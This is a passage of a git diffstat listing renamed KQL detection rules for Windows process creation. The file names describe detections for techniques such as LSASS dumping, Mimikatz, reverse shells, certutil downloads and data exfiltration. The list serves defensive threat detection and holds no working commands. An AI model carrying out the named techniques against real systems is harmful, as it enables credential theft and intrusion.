...ta_export_from_mssql_table_via_bcp_exe.kql | 0 .../delete_all_scheduled_tasks.kql | 0 .../delete_important_scheduled_task.kql | 0 ...eleted_data_overwritten_via_cipher_exe.kql | 0 ..._shadow_copies_via_wmi_with_powershell.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 .../detected_windows_software_discovery.kql | 0 ..._of_powershell_execution_via_sqlps_exe.kql | 0 .../devicecredentialdeployment_execution.kql | 0 ...launcher_exe_executes_specified_binary.kql | 0 .../direct_autorun_keys_modification.kql | 0 .../directory_removal_via_rmdir.kql | 0 .../process_creation}/dirlister_execution.kql | 2 +- .../disable_important_scheduled_task.kql | 0 ...indows_defender_av_security_monitoring.kql | 0 .../disable_windows_iis_http_logging.kql | 0 .../disabled_ie_security_features.kql | 0 .../disabled_volume_snapshots.kql | 0 ...der_wmi_autologger_session_via_reg_exe.kql | 0 .../discovery_of_a_system_time.kql | 0 ...ion_from_potential_suspicious_location.kql | 0 ...de_uncommon_script_extension_execution.kql | 0 .../dism_remove_online_package.kql | 0 .../dll_execution_via_rasautou_exe.kql | 0 ...execution_via_register_cimprovider_exe.kql | 0 .../dll_loaded_via_certoc_exe.kql | 0 ...dll_sideloading_by_vmware_xfer_utility.kql | 0 .../dllhost_exe_execution_anomaly.kql | 0 ...erserver_function_call_via_msiexec_exe.kql | 0 ...ltration_and_tunneling_tools_execution.kql | 0 .../domain_trust_discovery_via_dsquery.kql | 0 ...iver_dll_installation_via_odbcconf_exe.kql | 0 .../driverquery_exe_execution.kql | 0 .../dropping_of_password_filter_dll.kql | 0 ...nternals_suspicious_powershell_cmdlets.kql | 0 ...dumping_of_sensitive_hives_via_reg_exe.kql | 0 .../dumping_process_via_sqldumper_exe.kql | 0 .../dumpminitool_execution.kql | 0 .../dumpstack_log_defender_evasion.kql | 0 .../dynamic_net_compilation_via_csc_exe.kql | 0 .../email_exifiltration_via_powershell.kql | 0 .../enable_lm_hash_storage_proccreation.kql | 0 ...merate_all_information_with_whoami_exe.kql | 0 ...umeration_for_3rd_party_creds_from_cli.kql | 0 ...numeration_for_credentials_in_registry.kql | 0 .../esentutl_gather_credentials.kql | 0 .../esentutl_steals_browser_information.kql | 0 ...amper_in_net_processes_via_commandline.kql | 0 .../etw_trace_evasion_activity.kql | 0 .../exchange_powershell_snap_ins_usage.kql | 0 .../execute_code_with_pester_bat.kql | 0 ...execute_code_with_pester_bat_as_parent.kql | 0 .../execute_files_with_msdeploy_exe.kql | 0 .../execute_from_alternate_data_streams.kql | 0 ...execute_pcwrun_exe_to_leverage_follina.kql | 0 .../execution_of_non_existing_file.kql | 0 ..._of_powershell_script_in_public_folder.kql | 0 ...tion_of_suspicious_file_type_extension.kql | 0 .../execution_via_stordiag_exe.kql | 0 .../execution_via_workfolders_exe.kql | 0 .../explorer_nouaccheck_flag.kql | 0 .../explorer_process_tree_break.kql | 0 ...ports_critical_registry_keys_to_a_file.kql | 0 .../exports_registry_key_to_a_file.kql | 0 ..._subfolder_enumeration_via_dir_command.kql | 0 ...coded_from_base64_hex_via_certutil_exe.kql | 0 .../file_decryption_using_gpg4win.kql | 0 .../file_deletion_via_del.kql | 0 ..._download_and_execution_via_ieexec_exe.kql | 0 ...ad_from_browser_process_via_inline_url.kql | 10 +++++++++ ...nload_from_ip_based_url_via_certoc_exe.kql | 0 ...file_download_from_ip_url_via_curl_exe.kql | 0 ...ile_download_using_notepad_gup_utility.kql | 0 ...ile_download_using_protocolhandler_exe.kql | 0 .../file_download_via_bitsadmin.kql | 0 ...itsadmin_to_a_suspicious_target_folder.kql | 0 ...bitsadmin_to_an_uncommon_target_folder.kql | 0 .../file_download_via_certoc_exe.kql | 0 .../file_download_via_installutil_exe.kql | 0 ...load_via_windows_defender_mpcmprun_exe.kql | 0 .../file_download_with_headless_browser.kql | 0 ...ile_encoded_to_base64_via_certutil_exe.kql | 0 ..._via_gpg4win_from_suspicious_locations.kql | 0 .../file_encryption_using_gpg4win.kql | 0 ...ing_explorer_folder_shortcut_via_shell.kql | 0 ...ion_encoded_to_base64_via_certutil_exe.kql | 0 ...e_recovery_from_backup_via_wbadmin_exe.kql | 0 ...ous_extension_downloaded_via_bitsadmin.kql | 0 ...iles_added_to_an_archive_using_rar_exe.kql | 0 .../filter_driver_unloaded_via_fltmc_exe.kql | 0 .../findstr_gpp_passwords.kql | 0 .../findstr_launching_lnk_file.kql | 0 .../finger_exe_execution.kql | 0 ..._configuration_discovery_via_netsh_exe.kql | 0 .../firewall_disabled_via_netsh_exe.kql | 0 .../firewall_rule_deleted_via_netsh_exe.kql | 0 .../firewall_rule_update_via_netsh_exe.kql | 0 ...ous_output_via_compress_archive_cmdlet.kql | 0 .../forfiles_command_execution.kql | 0 ...orfiles_exe_child_process_masquerading.kql | 0 .../fsutil_drive_enumeration.kql | 0 .../fsutil_suspicious_invocation.kql | 0 ...esult_display_group_policy_information.kql | 0 .../process_creation}/gpscript_execution.kql | 0 .../greedy_file_deletion_using_del.kql | 0 ...mbership_reconnaissance_via_whoami_exe.kql | 0 .../gzip_archive_decode_via_powershell.kql | 0 .../hacktool_adcspwn_execution.kql | 0 ...cktool_bloodhound_sharphound_execution.kql | 0 .../hacktool_certify_execution.kql | 0 .../hacktool_certipy_execution.kql | 0 .../hacktool_covenant_powershell_launcher.kql | 0 .../hacktool_crackmapexec_execution.kql | 0 ...cktool_crackmapexec_execution_patterns.kql | 0 ...ol_crackmapexec_powershell_obfuscation.kql | 0 ...hacktool_crackmapexec_process_patterns.kql | 0 ...rsploit_empire_scheduled_task_creation.kql | 0 ..._dinjector_powershell_cradle_execution.kql | 0 ...ktool_dumpert_process_dumper_execution.kql | 0 .../hacktool_edrsilencer_execution.kql | 0 ...ol_empire_powershell_launch_parameters.kql | 0 .../hacktool_empire_powershell_uac_bypass.kql | 0 .../hacktool_execution_pe_metadata.kql | 0 .../hacktool_f_secure_c3_load_by_rundll32.kql | 0 ...rootkit_detector_and_remover_execution.kql | 0 ...ool_hashcat_password_cracker_execution.kql | 0 .../hacktool_hollowreaper_execution.kql | 0 .../hacktool_htran_natbypass_execution.kql | 0 ...ol_hydra_password_bruteforce_execution.kql | 0 .../hacktool_impacket_tools_execution.kql | 0 .../hacktool_impersonate_execution.kql | 0 .../hacktool_inveigh_execution.kql | 0 ...ol_jlaive_in_memory_assembly_execution.kql | 0 .../hacktool_koadic_execution.kql | 0 .../hacktool_krbrelay_execution.kql | 0 .../hacktool_krbrelayup_execution.kql | 0 .../hacktool_lazagne_execution.kql | 0 .../hacktool_mimikatz_execution.kql | 0 .../hacktool_pchunter_execution.kql | 0 ...ial_impacket_lateral_movement_activity.kql | 0 .../hacktool_powertool_execution.kql | 0 .../hacktool_purplesharp_execution.kql | 0 ..._pypykatz_credentials_dumping_activity.kql | 0 .../hacktool_quarks_pwdump_execution.kql | 0 ...l_redmimicry_winnti_playbook_execution.kql | 0 .../hacktool_remotekrbrelay_execution.kql | 0 .../hacktool_rubeus_execution.kql | 0 .../hacktool_safetykatz_execution.kql | 0 .../hacktool_securityxploded_execution.kql | 0 .../hacktool_sharpchisel_execution.kql | 0 .../hacktool_sharpdpapi_execution.kql | 0 .../hacktool_sharpersist_execution.kql | 0 .../hacktool_sharpevtmute_execution.kql | 0 .../hacktool_sharpimpersonation_execution.kql | 0 .../hacktool_sharpldapmonitor_execution.kql | 0 .../hacktool_sharpldapwhoami_execution.kql | 0 .../hacktool_sharpmove_tool_execution.kql | 0 ...acktool_sharpup_privesc_tool_execution.kql | 0 .../hacktool_sharpview_execution.kql | 0 ...hacktool_sharpwsus_wsuspendu_execution.kql | 0 ...acktool_silenttrinity_stager_execution.kql | 0 ...ool_sliver_c2_implant_activity_pattern.kql | 0 .../hacktool_soaphound_execution.kql | 0 .../hacktool_stracciatella_execution.kql | 0 .../hacktool_trufflesnout_execution.kql | 0 .../hacktool_winpeas_execution.kql | 0 .../hacktool_winpwn_execution.kql | 0 .../hacktool_winrm_access_via_evil_winrm.kql | 0 ...ool_wmiexec_default_powershell_command.kql | 0 .../hacktool_xordump_execution.kql | 0 ...ware_model_reconnaissance_via_wmic_exe.kql | 0 ...ting_of_wifi_credentials_via_netsh_exe.kql | 0 .../process_creation}/hh_exe_execution.kql | 0 ...hidden_powershell_in_link_file_pattern.kql | 0 .../hiding_files_with_attrib_exe.kql | 0 ...ecialaccounts_registry_key_commandline.kql | 0 ...or_privilege_escalation_tool_execution.kql | 0 ...l_help_hh_exe_suspicious_child_process.kql | 0 ...mputer_zone_for_http_protocols_via_cli.kql | 0 ..._code_module_command_line_installation.kql | 0 ...log_deletion_via_commandline_utilities.kql | 0 ...devices_unusual_parent_child_processes.kql | 0 ...interchange_format_file_via_ldifde_exe.kql | 0 ...om_suspicious_directories_proccreation.kql | 0 .../imports_registry_key_from_a_file.kql | 0 .../imports_registry_key_from_an_ads.kql | 0 ...cution_by_program_compatibility_wizard.kql | 0 ...xecution_from_script_file_via_bash_exe.kql | 0 ..._inline_command_execution_via_bash_exe.kql | 0 .../infdefaultinstall_exe_inf_execution.kql | 0 ...secure_proxy_doh_transfer_via_curl_exe.kql | 0 .../insecure_transfer_via_curl_exe.kql | 0 ...itive_subfolder_search_via_findstr_exe.kql | 0 ..._new_package_via_winget_local_manifest.kql | 0 .../installation_of_wsl_kali_linux.kql | 0 .../process_creation}/interactive_at_job.kql | 0 ...resting_service_enumeration_via_sc_exe.kql | 0 ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 0 .../invoke_obfuscation_clip_launcher.kql | 0 ...nvoke_obfuscation_compress_obfuscation.kql | 0 ..._obfuscation_obfuscated_iex_invocation.kql | 0 .../invoke_obfuscation_stdin_launcher.kql | 0 .../invoke_obfuscation_var_launcher.kql | 0 ...e_obfuscation_var_launcher_obfuscation.kql | 0 .../invoke_obfuscation_via_stdin.kql | 0 .../invoke_obfuscation_via_use_clip.kql | 0 .../invoke_obfuscation_via_use_mshta.kql | 0 .../java_running_with_remote_debugging.kql | 0 .../jscript_compiler_execution.kql | 0 ...kavremover_dropped_binary_lolbin_usage.kql | 0 .../kernel_memory_dump_via_livekd.kql | 0 .../launch_vsdevshell_ps1_proxy_execution.kql | 0 ...ed_module_enumeration_via_tasklist_exe.kql | 0 .../local_accounts_discovery.kql | 0 .../local_file_read_using_curl_exe.kql | 0 ...cal_groups_reconnaissance_via_wmic_exe.kql | 0 ...on_user_password_change_via_ksetup_exe.kql | 0 ...ol_binary_copied_from_system_directory.kql | 2 +- ...s_data_exfiltration_by_datasvcutil_exe.kql | 0 .../lolbin_runexehelper_use_as_proxy.kql | 0 .../lolbin_unregmp2_exe_use_as_proxy.kql | 0 ...sa_ppl_protection_disabled_via_reg_exe.kql | 0 .../lsass_dump_keyword_in_commandline.kql | 0 ...process_reconnaissance_via_findstr_exe.kql | 0 ...d_powershell_keywords_in_command_lines.kql | 0 ...on_by_microsoft_visual_studio_debugger.kql | 0 ...powershell_commandlets_processcreation.kql | 0 ...nents_file_execution_by_taef_detection.kql | 0 ...inject_inject_dll_into_running_process.kql | 0 ...soft_iis_connection_strings_decryption.kql | 0 ...ft_iis_service_account_password_dumped.kql | 0 .../mmc20_lateral_movement.kql | 0 ...h_reversed_extensions_using_rtlo_abuse.kql | 0 .../mmc_spawning_windows_shell.kql | 0 .../modify_group_policy_settings.kql | 0 .../monitoring_for_persistence_via_bits.kql | 0 .../msdt_execution_via_answer_file.kql | 0 ...sexchange_transport_agent_installation.kql | 0 ...cution_with_suspicious_file_extensions.kql | 0 ...ll_runhtmlapplication_suspicious_usage.kql | 0 .../msiexec_quiet_installation.kql | 0 .../process_creation}/msiexec_web_install.kql | 0 ...tsc_exe_execution_from_uncommon_parent.kql | 0 ...stsc_exe_execution_with_local_rdp_file.kql | 0 .../process_creation}/msxsl_exe_execution.kql | 0 .../net_webclient_casing_anomalies.kql | 0 ..._policy_on_microsoft_defender_firewall.kql | 0 .../network_reconnaissance_activity.kql | 0 ...ripteventconsumer_created_via_wmic_exe.kql | 0 ...capture_session_launched_via_dxcap_exe.kql | 0 .../new_dll_registered_via_odbcconf_exe.kql | 0 ...evelplugindll_installed_via_dnscmd_exe.kql | 0 .../new_firewall_rule_added_via_netsh_exe.kql | 0 ...neric_credentials_added_via_cmdkey_exe.kql | 0 .../new_kernel_driver_via_sc_exe.kql | 0 ...rk_trace_capture_started_via_netsh_exe.kql | 0 ...rt_forwarding_rule_added_via_netsh_exe.kql | 0 .../new_process_created_via_taskmgr_exe.kql | 0 .../new_process_created_via_wmic_exe.kql | 0 ...top_connection_initiated_via_mstsc_exe.kql | 0 ..._certificate_installed_via_certmgr_exe.kql | 0 ...certificate_installed_via_certutil_exe.kql | 0 .../new_service_creation_using_powershell.kql | 0 .../new_service_creation_using_sc_exe.kql | 0 .../new_user_created_via_net_exe.kql | 0 ...d_via_net_exe_with_never_expire_option.kql | 0 ...l_smart_card_created_via_tpmvscmgr_exe.kql | 0 .../nltest_exe_execution.kql | 0 .../node_process_executions.kql | 0 .../nodejs_execution_of_javascript_file.kql | 0 ...interactive_powershell_process_spawned.kql | 0 ..._privileged_usage_of_reg_or_powershell.kql | 0 .../notepad_password_files_discovery.kql | 0 ...rshell_download_cradle_processcreation.kql | 0 .../ntdllpipe_like_activity_execution.kql | 0 .../obfuscated_ip_download_activity.kql | 0 .../obfuscated_ip_via_cli.kql | 0 ...l_msi_install_via_windowsinstaller_com.kql | 0 ...fuscated_powershell_oneliner_execution.kql | 0 .../odbcconf_exe_suspicious_dll_location.kql | 0 ...xecution_of_malicious_embedded_scripts.kql | 0 ...openwith_exe_executes_specified_binary.kql | 0 ...erator_bloopers_cobalt_strike_commands.kql | 0 ...perator_bloopers_cobalt_strike_modules.kql | 0 ...eunsafeclientmailrules_setting_enabled.kql | 0 ...rd_provided_in_command_line_of_net_exe.kql | 0 .../password_set_to_never_expire_via_wmi.kql | 0 ...oy_remote_adminstartion_tool_execution.kql | 0 .../perl_inline_command_execution.kql | 0 .../permission_check_via_accesschk_exe.kql | 0 ...uration_reconnaissance_via_findstr_exe.kql | 0 .../persistence_via_sticky_key_backdoor.kql | 0 ...persistence_via_typedpaths_commandline.kql | 0 .../phishing_pattern_iso_in_archive.kql | 0 .../php_inline_command_execution.kql | 0 .../process_creation}/ping_hex_ip.kql | 0 .../pktmon_exe_execution.kql | 0 .../port_forwarding_activity_via_ssh_exe.kql | 0 .../portable_gpg_exe_execution.kql | 0 ...scalation_via_weak_service_permissions.kql | 0 ...umeration_using_ad_module_proccreation.kql | 0 .../potential_adplus_exe_abuse.kql | 0 .../potential_amazon_ssm_agent_hijacking.kql | 0 .../potential_amsi_bypass_using_null_bits.kql | 0 ...tential_amsi_bypass_via_net_reflection.kql | 0 ...cation_whitelisting_bypass_via_dnx_exe.kql | 0 ..._arbitrary_code_execution_via_node_exe.kql | 0 ...trary_command_execution_using_msdt_exe.kql | 0 ...rbitrary_command_execution_via_ftp_exe.kql | 0 ...ntial_arbitrary_dll_load_using_winword.kql | 0 ...file_download_using_office_application.kql | 0 ...arbitrary_file_download_via_cmdl32_exe.kql | 0 ...inary_impersonating_sysinternals_tools.kql | 0 ...ial_binary_proxy_execution_via_cdb_exe.kql | 0 ..._proxy_execution_via_vsdiagnostics_exe.kql | 0 .../potential_browser_data_stealing.kql | 0 ...otential_cobaltstrike_process_patterns.kql | 0 ...ownload_cradles_usage_process_creation.kql | 0 ...nd_line_path_traversal_evasion_attempt.kql | 0 ...ne_obfuscation_using_escape_characters.kql | 0 ...icode_characters_from_suspicious_image.kql | 0 ...commandline_path_traversal_via_cmd_exe.kql | 0 ...and_service_reconnaissance_via_reg_exe.kql | 0 .../potential_cookies_session_hijacking.kql | 0 ..._attempt_using_new_networkprovider_cli.kql | 0 ...ential_dumping_via_lsass_process_clone.kql | 0 .../potential_credential_dumping_via_wer.kql | 0 .../potential_crypto_mining_activity.kql | 0 ...tration_activity_via_commandline_tools.kql | 0 ...ealing_via_chromium_headless_debugging.kql | 0 ...ivity_via_emoji_usage_in_commandline_1.kql | 0 ...ivity_via_emoji_usage_in_commandline_2.kql | 0 ...ivity_via_emoji_usage_in_commandline_3.kql | 0 ...ivity_via_emoji_usage_in_commandline_4.kql | 0 ...tial_defense_evasion_via_binary_rename.kql | 0 ...via_rename_of_highly_relevant_binaries.kql | 0 ...nse_evasion_via_right_to_left_override.kql | 0 ...tial_discovery_activity_via_dnscmd_exe.kql | 0 ...nload_via_powershell_invoke_webrequest.kql | 0 ...jection_or_execution_using_tracker_exe.kql | 0 ...tial_dll_injection_via_acccheckconsole.kql | 0 ...dll_sideloading_via_deviceenroller_exe.kql | 0 .../potential_dosfuscation_activity.kql | 0 ...oad_upload_activity_using_type_command.kql | 0 ...r_script_execution_via_wscript_cscript.kql | 0 ...ded_powershell_patterns_in_commandline.kql | 0 ...eral_movement_via_activatemicrosoftapp.kql | 0 ...ential_execution_of_sysinternals_tools.kql | 0 ...al_fake_instance_of_hxtsr_exe_executed.kql | 0 ...d_via_ms_appinstaller_protocol_handler.kql | 0 ...ile_overwrite_via_sysinternals_sdelete.kql | 0 ...n_via_ntfs_index_allocation_stream_cli.kql | 0 ...lyph_attack_using_lookalike_characters.kql | 0 ...eral_movement_via_windows_remote_shell.kql | 0 ...otential_lethalhta_technique_execution.kql | 0 ...ential_lsass_process_dump_via_procdump.kql | 0 ...anage_bde_wsf_abuse_to_proxy_execution.kql | 0 ...ial_memory_dumping_activity_via_livekd.kql | 0 ...tial_meterpreter_cobaltstrike_activity.kql | 0 .../potential_mftrace_exe_abuse.kql | 0 ..._dll_sideloading_via_defender_binaries.kql | 0 .../potential_msiexec_masquerading.kql | 0 .../potential_mstsc_shadowing_activity.kql | 0 ..._sniffing_activity_using_network_tools.kql | 0 ...tential_ntlm_coercion_via_certutil_exe.kql | 0 ...l_obfuscated_ordinal_call_via_rundll32.kql | 0 ...word_spraying_attempt_using_dsacls_exe.kql | 0 ...attempt_via_existing_service_tampering.kql | 0 ...nce_attempt_via_run_keys_using_reg_exe.kql | 0 ...sistence_via_logon_scripts_commandline.kql | 0 ..._via_microsoft_compatibility_appraiser.kql | 0 ...ntial_persistence_via_netsh_helper_dll.kql | 0 ...powershell_search_order_hijacking_task.kql | 0 ...etoolboxcmd_exe_vm_state_change_script.kql | 0 ...al_powershell_command_line_obfuscation.kql | 0 ...istory_access_attempt_via_history_file.kql | 0 .../potential_powershell_downgrade_attack.kql | 0 ...xecution_policy_tampering_proccreation.kql | 0 ...potential_powershell_execution_via_dll.kql | 0 ...hell_obfuscation_via_reversed_commands.kql | 0 ..._powershell_obfuscation_via_wchar_char.kql | 0 ...ial_powershell_reverseshell_connection.kql | 0 ...l_privilege_escalation_to_local_system.kql | 0 ...tion_using_symlink_between_osk_and_cmd.kql | 0 ...ation_via_service_permissions_weakness.kql | 0 ..._execution_proxy_via_cl_invocation_ps1.kql | 0 ...tential_process_injection_via_msra_exe.kql | 0 ...duct_class_reconnaissance_via_wmic_exe.kql | 0 ...al_product_reconnaissance_via_wmic_exe.kql | 0 ...y_key_abuse_for_binary_proxy_execution.kql | 0 ...aunch_exe_binary_proxy_execution_abuse.kql | 0 .../potential_psexec_remote_execution.kql | 0 ...thorized_mbr_tampering_via_bcdedit_exe.kql | 0 ...tential_rdp_session_hijacking_activity.kql | 0 .../potential_rdp_tunneling_via_plink.kql | 0 .../potential_rdp_tunneling_via_ssh.kql | 0 ...l_recon_activity_using_driverquery_exe.kql | 0 ...otential_recon_activity_via_nltest_exe.kql | 0 ...nce_activity_via_gathernetworkinfo_vbs.kql | 0 ..._for_cached_credentials_via_cmdkey_exe.kql | 0 ...ger_content_execution_via_werfault_exe.kql | 0 ...ntial_register_app_vbs_lolscript_abuse.kql | 0 ...tial_regsvr32_commandline_flag_anomaly.kql | 0 .../potential_remote_desktop_tunneling.kql | 0 .../potential_renamed_rundll32_execution.kql | 0 ...dll32_execution_with_dll_stored_in_ads.kql | 0 ...xy_execution_via_cl_mutexverifiers_ps1.kql | 0 ..._shelldispatch_dll_functionality_abuse.kql | 0 ...m_database_persistence_via_sdbinst_exe.kql | 0 ..._bypass_via_windows_developer_features.kql | 0 ...ential_smb_relay_attack_tool_execution.kql | 0 ...tential_spn_enumeration_via_setspn_exe.kql | 0 ...istence_install_using_a_scheduled_task.kql | 0 ...tial_suspicious_activity_using_secedit.kql | 0 ...er_launch_from_document_reader_process.kql | 0 ...potential_suspicious_mofcomp_execution.kql | 0 ...ous_registry_file_imported_via_reg_exe.kql | 0 ...s_windows_feature_enabled_proccreation.kql | 0 ...otential_sysinternals_procdump_evasion.kql | 0 ..._rdp_related_registry_keys_via_reg_exe.kql | 2 +- ...pering_with_security_products_via_wmic.kql | 0 .../potential_uac_bypass_via_sdclt_exe.kql | 0 ...rvice_path_reconnaissance_via_wmic_exe.kql | 0 ...potential_winapi_calls_via_commandline.kql | 0 ...fender_av_bypass_via_dump64_exe_rename.kql | 0 ...indows_defender_tampering_via_wmic_exe.kql | 0 ...l_movement_wmiprvse_spawned_powershell.kql | 0 ...e_permissions_granted_using_dsacls_exe.kql | 0 ...asp_net_compilation_via_aspnetcompiler.kql | 0 ...ally_suspicious_cabinet_file_expansion.kql | 0 ...ous_call_to_win32_nteventlogfile_class.kql | 0 ...child_process_of_clickonce_application.kql | 0 ...icious_child_process_of_diskshadow_exe.kql | 0 ...ious_child_process_of_keyscrambler_exe.kql | 0 ...y_suspicious_child_process_of_regsvr32.kql | 0 ...lly_suspicious_child_process_of_vscode.kql | 0 ...suspicious_child_process_of_winrar_exe.kql | 0 ...ous_child_processes_spawned_by_conhost.kql | 0 ...y_suspicious_cmd_shell_output_redirect.kql | 0 ...ommand_targeting_teams_sensitive_files.kql | 0 ...esktop_background_change_using_reg_exe.kql | 0 ...icious_dll_registered_via_odbcconf_exe.kql | 0 ...cious_electron_application_commandline.kql | 0 ..._suspicious_event_viewer_child_process.kql | 0 ...con_activity_using_log_query_utilities.kql | 0 ...n_from_parent_process_in_public_folder.kql | 0 ...uspicious_execution_of_pdqdeployrunner.kql | 0 ..._regasm_regsvcs_from_uncommon_location.kql | 0 ...regasm_regsvcs_with_uncommon_extension.kql | 0 ...file_sharing_domain_via_powershell_exe.kql | 0 ..._suspicious_googleupdate_child_process.kql | 0 ...javascript_execution_via_nodejs_binary.kql | 0 ...ly_suspicious_jwt_token_search_via_cli.kql | 0 ...ous_ntfs_symlink_behavior_modification.kql | 12 ++++++++++ ...ocument_executed_from_trusted_location.kql | 0 ...spicious_ping_copy_command_combination.kql | 0 ...y_suspicious_regsvr32_http_ftp_pattern.kql | 0 ...ly_suspicious_regsvr32_http_ip_pattern.kql | 0 ...tentially_suspicious_rundll32_activity.kql | 0 ...ous_rundll32_exe_execution_of_udl_file.kql | 0 .../potentially_suspicious_usage_of_qemu.kql | 0 ...tially_suspicious_webdav_lnk_execution.kql | 0 ...tially_suspicious_windows_app_activity.kql | 0 ...base64_encoded_frombase64string_cmdlet.kql | 0 .../powershell_base64_encoded_iex_cmdlet.kql | 0 ...wershell_base64_encoded_invoke_keyword.kql | 0 ...ell_base64_encoded_mppreference_cmdlet.kql | 0 ...ase64_encoded_reflective_assembly_load.kql | 0 .../powershell_base64_encoded_wmi_classes.kql | 0 ...wershell_defender_disable_scan_feature.kql | 0 .../powershell_defender_exclusion.kql | 0 ...fault_action_set_to_allow_or_noaction_.kql | 0 ...ershell_download_and_execution_cradles.kql | 0 .../powershell_download_pattern.kql | 0 ...executed_from_headless_conhost_process.kql | 0 ...with_potential_decryption_capabilities.kql | 0 ...owershell_get_clipboard_cmdlet_via_cli.kql | 0 .../powershell_get_process_lsass.kql | 0 ...owershell_inline_execution_from_a_file.kql | 0 ...dowsinstaller_com_from_remote_location.kql | 0 .../process_creation}/powershell_sam_copy.kql | 0 ...l_script_change_permission_via_set_acl.kql | 0 .../powershell_script_run_in_appdata.kql | 0 .../powershell_set_acl_on_windows_folder.kql | 0 ...ell_token_obfuscation_process_creation.kql | 0 ...ll_web_access_feature_enabled_via_dism.kql | 0 .../ppl_tampering_via_werfaultsecure.kql | 17 ++++++++++++++ .../printbrm_zip_creation_of_extraction.kql | 0 ...s_reconnaissance_via_commandline_tools.kql | 0 ...scalation_via_named_pipe_impersonation.kql | 0 .../process_creation}/procdump_execution.kql | 0 ...ss_access_via_trolleyexpress_exclusion.kql | 0 ...rocess_creation_using_sysnative_folder.kql | 0 ...n_from_a_potentially_suspicious_folder.kql | 0 .../process_launched_without_image_name.kql | 0 .../process_memory_dump_via_comsvcs_dll.kql | 0 .../process_memory_dump_via_dotnet_dump.kql | 0 ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 0 ...ocess_proxy_execution_via_squirrel_exe.kql | 0 .../process_reconnaissance_via_wmic_exe.kql | 0 .../proxy_execution_via_vshadow.kql | 0 .../proxy_execution_via_wuauclt_exe.kql | 0 .../process_creation}/psexec_execution.kql | 0 ...exec_paexec_escalation_to_local_system.kql | 0 ...hild_process_execution_as_local_system.kql | 0 .../psexec_service_execution.kql | 0 .../pua_3proxy_execution.kql | 0 .../pua_adfind_suspicious_execution.kql | 12 ++++++++++ .../pua_adidnsdump_execution.kql | 0 .../pua_advanced_ip_scanner_execution.kql | 0 .../pua_advanced_port_scanner_execution.kql | 0 .../pua_advancedrun_execution.kql | 0 .../pua_advancedrun_suspicious_execution.kql | 0 .../pua_chisel_tunneling_tool_execution.kql | 0 .../pua_cleanwipe_execution.kql | 0 .../pua_crassus_execution.kql | 0 .../pua_csexec_execution.kql | 0 .../pua_defendercheck_execution.kql | 0 .../pua_dit_snapshot_viewer.kql | 0 .../pua_fast_reverse_proxy_frp_execution.kql | 0 .../pua_iox_tunneling_tool_execution.kql | 0 .../pua_mouse_lock_execution.kql | 0 .../pua_netcat_suspicious_execution.kql | 0 .../process_creation}/pua_ngrok_execution.kql | 0 .../pua_nimgrab_execution.kql | 0 .../pua_nircmd_execution.kql | 0 .../pua_nircmd_execution_as_local_system.kql | 0 .../pua_nmap_zenmap_execution.kql | 0 .../pua_nps_tunneling_tool_execution.kql | 0 .../process_creation}/pua_nsudo_execution.kql | 0 .../pua_pingcastle_execution.kql | 0 ...ion_from_potentially_suspicious_parent.kql | 0 ...ential_pe_metadata_tamper_using_rcedit.kql | 0 .../pua_process_hacker_execution.kql | 0 .../pua_radmin_viewer_utility_execution.kql | 0 .../pua_rclone_execution.kql | 0 .../pua_restic_backup_tool_execution.kql | 0 .../pua_runxcmd_execution.kql | 0 .../pua_seatbelt_execution.kql | 0 .../pua_softperfect_netscan_execution.kql | 0 ...vedirectory_enumeration_via_adfind_exe.kql | 0 .../pua_system_informer_execution.kql | 0 .../pua_trufflehog_execution.kql | 0 .../pua_webbrowserpassview_execution.kql | 0 .../pua_wsudo_suspicious_execution.kql | 0 .../pubprn_vbs_proxy_execution.kql | 0 ...ion_security_warning_disabled_in_excel.kql | 0 .../python_inline_command_execution.kql | 0 .../python_spawning_pretty_tty_on_windows.kql | 0 .../query_usage_to_exfil_data.kql | 0 .../quickassist_execution.kql | 0 .../process_creation}/raccine_uninstall.kql | 0 ...ge_with_password_and_compression_level.kql | 0 .../rdp_connection_allowed_via_netsh_exe.kql | 0 ...win32_terminalservicesetting_wmi_class.kql | 15 +++++++++++++ ...rt_forwarding_rule_added_via_netsh_exe.kql | 0 .../read_contents_from_stdin_via_cmd_exe.kql | 0 ...formance_counter_values_via_lodctr_exe.kql | 0 ...on_command_output_piped_to_findstr_exe.kql | 0 ...rmation_for_export_with_command_prompt.kql | 0 .../reg_add_suspicious_paths.kql | 0 ...ion_without_commandline_flags_or_files.kql | 0 .../regedit_as_trusted_installer.kql | 0 .../register_app_vbs_proxy_execution.kql | 0 ...stry_export_of_third_party_credentials.kql | 0 ...gistry_manipulation_via_wmi_stdregprov.kql | 0 ...stry_modification_attempt_via_vbscript.kql | 12 ++++++++++ .../registry_modification_via_regini_exe.kql | 0 ...ecution_with_suspicious_file_extension.kql | 0 ..._dll_execution_with_uncommon_extension.kql | 0 ...cution_from_highly_suspicious_location.kql | 0 ...ion_from_potential_suspicious_location.kql | 0 .../remote_access_tool_anydesk_execution.kql | 0 ...ydesk_execution_from_suspicious_folder.kql | 0 ...with_known_revoked_signing_certificate.kql | 0 ...ss_tool_anydesk_piped_password_via_cli.kql | 0 ...ccess_tool_anydesk_silent_installation.kql | 0 ...emote_access_tool_gotoassist_execution.kql | 0 .../remote_access_tool_logmein_execution.kql | 0 ...gent_command_execution_via_meshcentral.kql | 0 ...emote_access_tool_netsupport_execution.kql | 0 ..._potential_meshagent_execution_windows.kql | 0 ...ol_renamed_meshagent_execution_windows.kql | 0 ..._rurat_execution_from_unusual_location.kql | 0 ...te_access_tool_screenconnect_execution.kql | 0 ...l_screenconnect_installation_execution.kql | 0 ...al_suspicious_remote_command_execution.kql | 0 ...screenconnect_remote_command_execution.kql | 0 ...reenconnect_server_web_shell_execution.kql | 0 ...mote_access_tool_simple_help_execution.kql | 0 ...potentially_attacker_controlled_server.kql | 0 ...viewer_session_started_on_windows_host.kql | 0 ...mote_access_tool_ultraviewer_execution.kql | 0 ...chm_file_download_execution_via_hh_exe.kql | 0 .../remote_code_execute_via_winrm_vbs.kql | 0 ...download_via_desktopimgdownldr_utility.kql | 0 .../remote_file_download_via_findstr_exe.kql | 0 ...powershell_session_host_process_winrm_.kql | 0 .../remote_xsl_execution_via_msxsl_exe.kql | 0 ...ablement_abuse_via_atomictestharnesses.kql | 0 ...hosted_hta_file_executed_via_mshta_exe.kql | 0 .../renamed_autohotkey_exe_execution.kql | 0 .../renamed_boinc_client_execution.kql | 0 .../renamed_browsercore_exe_execution.kql | 0 .../renamed_cloudflared_exe_execution.kql | 0 .../renamed_createdump_utility_execution.kql 